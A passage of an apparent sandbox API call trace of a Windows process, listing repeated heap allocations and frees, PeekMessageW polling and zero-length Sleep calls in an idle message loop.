out: lpMsg=0x87fa94) returned 0 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.942] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.942] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.942] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.942] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.943] Sleep (dwMilliseconds=0x0) [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.943] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.943] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.943] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.943] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.943] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.943] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.944] Sleep (dwMilliseconds=0x0) [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.944] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.944] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.944] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.944] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.944] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.945] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.945] Sleep (dwMilliseconds=0x0) [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.945] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.945] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.945] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.946] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.946] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.946] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.946] Sleep (dwMilliseconds=0x0) [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.946] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.946] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.946] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.947] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.947] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.947] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.947] Sleep (dwMilliseconds=0x0) [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.947] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.947] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.947] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.948] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.948] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.948] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.948] Sleep (dwMilliseconds=0x0) [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.948] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.948] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.948] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.949] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.949] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.949] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.949] Sleep (dwMilliseconds=0x0) [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.949] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.949] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.949] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.950] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.950] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.950] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.950] Sleep (dwMilliseconds=0x0) [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.950] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.950] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.950] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.951] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.951] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.951] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.951] Sleep (dwMilliseconds=0x0) [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.951] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.951] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.951] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.952] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.952] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.952] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe789d8 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4d90 [0254.952] Sleep (dwMilliseconds=0x0) [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe789d8 | out: hHeap=0xc60000) returned 1 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d90 | out: hHeap=0xc60000) returned 1 [0254.952] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.952] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.952] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4cd0 [0254.953] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4cd0 | out: hHeap=0xc60000) returned 1 [0254.953] 